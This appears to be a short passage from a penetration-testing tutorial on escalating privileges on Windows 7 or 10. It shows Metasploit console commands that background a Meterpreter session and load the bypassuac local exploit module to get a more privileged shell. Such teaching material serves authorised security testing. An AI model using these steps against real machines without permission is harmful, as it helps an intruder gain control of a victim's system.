Local system escalation
In the case of Windows 10 or Windows 7, we may be able to run the Meterpreter shell on the context of the user. This can be bypassed by using multiple post-exploit module by sending background
to your Meterpreter shell and using any of the following exploit modules depending on the compromised victim machine; in this example, we will utilize the bypassuac
post-exploit module, as shown in the following screenshot:
meterpreter > background[*] Backgrounding session 2...msf exploit(psexec) > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set session 2session => 2
The bypassuac
module in the Meterpreter shell will utilize the existing session to provide a more privileged Meterpreter shell, as shown in the following screenshot: